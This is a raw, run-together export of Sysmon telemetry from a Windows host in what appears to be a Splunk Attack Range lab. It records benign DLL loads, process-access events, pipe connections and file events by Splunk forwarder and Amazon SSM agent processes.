Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057344858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057344855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344854Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344851Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344850Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344849Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344848Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344847Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344846Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344845Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344844Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057344843Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344842Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057344841Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.772{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344840Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.772{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344839Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.772{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344838Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.772{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344837Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.772{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42trueSplunk, Inc.Valid 10341000x800000000000000057344836Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.772{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344835Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.772{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344834Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.757{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057344833Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:09.756{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344832Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:09.756{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344831Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:09.756{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344830Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:09.756{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344829Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:09.756{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344828Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:09.756{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057344827Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.709{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344826Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.709{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F77D2E69648030FE00F42E889A158F3B,SHA256=8DBE99284B14F01BFCC70A6786090D8AD14FE6B393DC4B0F40AC757EEE795B62falsetrue 23542300x800000000000000057344825Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.290{8B6011A9-887D-6164-2C00-00000000F101}2924NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\surveyor-20211011185454-44546MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7falsetrue 534500x800000000000000057344824Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.272{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344823Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.272{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057344822Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.272{8B6011A9-5B09-618E-3AF3-04000000F101}71769496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344821Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.272{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344820Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.272{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x800000000000000057344819Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.110{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344818Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.110{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344817Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.110{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344816Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:09.109{8B6011A9-5B09-618E-3AF3-04000000F101}7176\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344815Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.108{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344814Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:09.108{8B6011A9-5B09-618E-3AF3-04000000F101}7176\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344813Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.107{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344812Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.107{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344811Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.106{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344810Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.106{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344809Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 